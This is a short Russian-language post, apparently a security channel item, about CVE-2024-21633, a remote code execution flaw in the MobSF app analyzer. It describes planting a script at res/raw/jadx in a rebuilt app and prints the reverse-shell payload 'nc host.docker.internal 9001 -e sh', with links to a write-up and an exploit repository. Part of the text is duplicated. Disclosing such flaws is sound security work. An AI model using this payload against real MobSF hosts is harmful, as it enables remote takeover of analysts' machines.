#CVE-2024-21633 - #MobSF Remote code execution (#RCE)
MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.
Пересобрав приложение с ночинкой в
Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути
https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
https://github.com/0x33c0unt/CVE-2024-21633
MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.
Пересобрав приложение с ночинкой в
res/raw/jadx
к примерутакого содержания:
#!/bin/bash
nc host.docker.internal 9001 -e sh
Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути
${decode target path}/res/
https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
https://github.com/0x33c0unt/CVE-2024-21633